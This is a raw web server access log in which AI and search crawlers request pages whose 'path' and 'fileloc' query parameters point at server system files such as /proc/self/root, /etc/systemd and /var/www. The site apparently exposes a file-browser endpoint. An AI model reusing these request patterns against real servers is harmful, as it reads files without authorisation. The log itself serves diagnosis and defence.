74.7.227.189 - - [09/Nov/2025:01:13:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/memory3 HTTP/1.0" 200 3610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.23.112.144 - - [09/Nov/2025:01:13:29 +0000] "GET /our-works/tvc-relax-gaba/?path=//etc/systemd/system/timers.target.wants HTTP/1.0" 200 3666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:13:30 +0000] "GET /q-~43LA62Z8NwrzlSzodtlYmCWsJXVRFfcv43640/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:30 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Furllib3%2Fcontrib%2F_appengine_environ.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Furllib3%2Fcontrib HTTP/1.0" 200 3331 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:30 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fclick%2F_winconsole.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fclick HTTP/1.0" 200 5848 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:30 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Fmisc%2Forplus.cocci&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Fmisc HTTP/1.0" 200 3419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:31 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fnfc%2Fs3fwrn5%2FKconfig&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fnfc%2Fs3fwrn5 HTTP/1.0" 200 3240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/memory3 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:13:31 +0000] "GET /q-~185IPgw5nsRaSLwSoVGN0yEdrluow2BUw7208/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:31 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fcommand%2Finstall_data.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fcommand HTTP/1.0" 200 3776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:32 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm%2Fstring.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm HTTP/1.0" 200 3102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
